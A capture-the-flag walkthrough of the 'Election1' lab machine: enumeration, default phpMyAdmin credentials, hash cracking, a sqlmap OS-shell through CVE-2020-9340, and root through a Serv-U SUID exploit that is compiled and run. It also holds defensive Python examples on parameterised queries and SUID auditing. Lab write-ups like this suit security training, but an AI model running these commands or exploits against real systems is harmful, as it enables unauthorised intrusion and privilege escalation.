In this walkthrough, we will be going through the Election1 room from Proving Grounds. This room is rated as Intermediate on the platform and consists of the exploitation of two CVEs, one for initial access and the other for privilege escalation. So, let's get started without any delay.
Machine Info:

| Field | Value |
| --- | --- |
| Title | Election1 |
| IP address | 192.168.159.211 |
| Difficulty | Intermediate |
| OS | Linux |
| Description | Election is an intermediate level machine which leverages the exploitation of two CVEs – one for initial access and the other for privilege escalation. |
Enumeration:
- I started off with my regular aggressive nmap scan and found two open ports: 22 (SSH) and 80 (HTTP).
```
$ sudo nmap -A 192.168.159.211
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-05 11:39 IST
Nmap scan report for 192.168.159.211
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
| vulners:
|   cpe:/a:openbsd:openssh:7.6p1:
|_  [vulners entries omitted]
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| vulners:
|   cpe:/a:apache:http_server:2.4.29:
|_  [vulners entries omitted]
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
[fingerprint omitted]
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   192.16 ms 192.168.45.1
2   192.12 ms 192.168.45.254
3   192.19 ms 192.168.251.1
4   192.25 ms 192.168.159.211

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.21 seconds
```
- Enumerated the web server running on port 80 and found the default Apache2 page.
Directory Bruteforcing
- Fired gobuster at the web server to reveal hidden directories and found two interesting entries: phpmyadmin and robots.txt.
```
$ gobuster dir -u http://192.168.159.211/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x php,txt,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.159.211/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,html,php
[+] Timeout:                 10s
===============================================================
2024/01/05 11:49:22 Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 323] [--> http://192.168.159.211/javascript/]
/index.html           (Status: 200) [Size: 10918]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.159.211/phpmyadmin/]
/robots.txt           (Status: 200) [Size: 30]
```
- I first checked the phpMyAdmin page, which was accessible to us. I tried the default credentials root:password, but access was denied, so I left it there for the moment.
- Next, I checked the robots.txt file, which reveals an interesting directory called election. As it has the same name as the box, it is worth checking.
Enumerating Election System
- The directory reveals a web-based Election Management System. On the front page there is a candidates section which shows each candidate's name and username.
- Along with that, we can also type a voter's code to vote for a candidate; however, the code first needs to be registered from the admin section.
- I performed another directory bruteforce with gobuster, this time on the /election directory, and it revealed the admin backend directory, which was simply /admin. LOL!
```
$ gobuster dir -u http://192.168.171.211/election/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.171.211/election/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/05 13:22:04 Starting gobuster in directory enumeration mode
===============================================================
/media                (Status: 301) [Size: 327] [--> http://192.168.171.211/election/media/]
/js                   (Status: 301) [Size: 324] [--> http://192.168.171.211/election/js/]
/admin                (Status: 301) [Size: 327] [--> http://192.168.171.211/election/admin/]
/themes               (Status: 301) [Size: 328] [--> http://192.168.171.211/election/themes/]
/lib                  (Status: 301) [Size: 325] [--> http://192.168.171.211/election/lib/]
/data                 (Status: 301) [Size: 326] [--> http://192.168.171.211/election/data/]
/languages            (Status: 301) [Size: 331] [--> http://192.168.171.211/election/languages/]
```
- Navigating to the found directory reveals a page which requires an already existing admin ID to proceed further. I tried various inputs like 1, admin1, Love, 2, etc., but all failed. Next, I tried an SQL authentication bypass and changed some parameters in Burp Suite to get around the restriction, but that failed as well.
Enumerating phpMyAdmin
- I moved back to enumerating the phpMyAdmin login panel. This time I tried a bunch of common username/password combinations and got a positive on root:toor.
- Once inside, I looked through all the databases thoroughly and found some hashed passwords too. I cracked them and saved them in case they were required later.
- At this point I was trying to get a reverse shell via phpMyAdmin, but that technique failed. Sometimes we do not see what is in front of us and try more complex methods to get in, when in reality the answer was there the whole time. In one of the databases, named "tb_panitia", I found the password hash of user "Love":
```
Love: bb113886b0513a9d882e3caa5cd73314
Love: Zxc123!@#
```
- Cracked it using hashes.com and got the password.
- With the found admin ID and password, I got into the election backend dashboard.
Initial Access:
- Checking the system info of the running application showed that it is on Patch Update "2". I found a number of exploits for it, but the right one was the SQL injection, CVE-2020-9340.
Exploiting CVE-2020-9340
- To exploit the SQL injection in the candidate registration section of the application, we first have to create a demo user.
- Next, intercept the request that edits the user with Burp Suite and analyse the response while changing the number in the "id" parameter. When I kept the id as "77" for my demo user, I got a positive response back with the user's details in JSON format.
- I changed the ID to something random and got a 404 response.
- I used a common SQL injection payload on the id parameter and it returned a positive response, confirming that it is vulnerable to SQL injection.
```
# ID value may differ as per your user.
77 AND 1=1
```
- Now we will leverage sqlmap to get a command shell on the target through the SQL injection. For that, save the Burp Suite request to a file named request.txt and run sqlmap on it. After a while, we get a shell prompt.
```
sqlmap -r request.txt --level=5 --risk=3 --os-shell -p id
```
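To show the mechanism behind the "77 AND 1=1" probe, here is an added example (not the election application's code; its real schema is not on the page, so the table and column names are constructed): a lookup that concatenates the id parameter the way a vulnerable endpoint does, beside a hardened version that validates and binds it.

```python
import sqlite3

# Constructed sample rows standing in for the candidate table; the schema
# below is an assumption for illustration, not the application's own.
_CANDIDATES = [
    (77, "demo", "Demo Candidate"),
    (78, "love", "Love"),
]


def _connect():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE candidates (id INTEGER PRIMARY KEY, username TEXT, name TEXT)"
    )
    conn.executemany("INSERT INTO candidates VALUES (?, ?, ?)", _CANDIDATES)
    return conn


def lookup_vulnerable(raw_id):
    """Concatenates the request's id straight into the query, the pattern behind
    the injection in the walkthrough. '77 AND 1=1' still matches row 77 while
    '77 AND 1=2' matches nothing: that difference is the boolean oracle the
    tester observed (200 with JSON vs. 404), and sqlmap automates it."""
    conn = _connect()
    sql = f"SELECT id, username, name FROM candidates WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def lookup_hardened(raw_id):
    """Rejects anything that is not a plain integer and binds the value as a
    parameter, so SQL in the id never reaches the parser. Returns None for
    invalid input (the endpoint would answer 400), [] for an unknown id."""
    if not isinstance(raw_id, str) or not raw_id.isdigit():
        return None
    conn = _connect()
    sql = "SELECT id, username, name FROM candidates WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    for probe in ("77", "77 AND 1=1", "77 AND 1=2"):
        print(f"{probe!r:16} vulnerable={lookup_vulnerable(probe)} "
              f"hardened={lookup_hardened(probe)}")
```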
- Checking the system.log file in the /admin/logs directory reveals the password of user Love.
```
cat /var/www/html/election/admin/logs/system.log
```
- Got our initial foothold on the target via SSH using the found credentials.
```
ssh [email protected] P@$$w0rd@123
```
- Captured the user and local flag.
Privilege Escalation:
- Next, I uploaded LinPEAS to the target to look for privilege escalation vectors and found an unusual binary called Serv-U, which is vulnerable to CVE-2019-12181. The binary can also be found with the command below.
```
find / -perm -u=s -type f 2>/dev/null
```
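As an added example, not from the walkthrough, the same setuid hunt from the defender's side in Python: the find is re-implemented and its results are compared against a baseline of expected setuid files, so that a stray binary such as Serv-U stands out. The baseline list and the sample paths in the usage are assumptions.

```python
import os
import stat

# Baseline of setuid files normally present on a stock Ubuntu 18.04 host.
# This list is an assumption for illustration, not an authoritative
# inventory; build yours from a clean image of the same release.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Pseudo-filesystems that hold no real binaries; skipped during the walk.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def collect_suid(root="/"):
    """Equivalent of 'find / -perm -u=s -type f 2>/dev/null': return a list of
    (path, owner uid) for every regular file with the setuid bit set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid))
    return found


def classify_suid(entries, baseline=BASELINE_SUID):
    """Return the entries that are not in the baseline. A root-owned setuid
    file outside it (a third-party daemon such as Serv-U, or a copied shell
    under /tmp) is the first thing to review on a suspected compromise."""
    unexpected = []
    for path, uid in entries:
        if path in baseline:
            continue
        unexpected.append({"path": path, "uid": uid, "root_owned": uid == 0})
    return unexpected


if __name__ == "__main__":
    # Constructed sample entries; the Serv-U path is a placeholder, not the
    # machine's real install location. For a live host use collect_suid("/").
    sample = [("/usr/bin/passwd", 0), ("/usr/local/Serv-U/Serv-U", 0)]
    for hit in classify_suid(sample):
        print(f"[!] unexpected setuid file: {hit['path']} (uid {hit['uid']})")
```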
- Checked the known exploits for Serv-U, which confirms a local privilege escalation exploit.
```
searchsploit Serv-U
```
- Copied the exploit to my working directory and then uploaded it to the target.
```
searchsploit -m linux/local/47009.c
```
- Compiled the exploit and ran it, which granted me root access on the target.
```
gcc 47009.c -o exploit
./exploit
```
- Finally, captured the proof.txt flag and completed the challenge.
Conclusion:
So that was "Election1" for you. We started off with a regular nmap scan and found only two open ports, 22 (SSH) and 80 (HTTP). We enumerated the web server on port 80 and found an Election Management System. Further enumeration revealed a phpMyAdmin installation. We tried a bunch of common username and password combinations and successfully got in using root:toor. Next, we gathered the hashed password of user Love from the database and cracked it using hashes.com. With the found password, we logged into the Election Management System. We enumerated the version running on it and found that it is vulnerable to CVE-2020-9340, which we used to get initial access on the target. For privilege escalation, we used the Serv-U local privilege escalation exploit to get root on the target. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".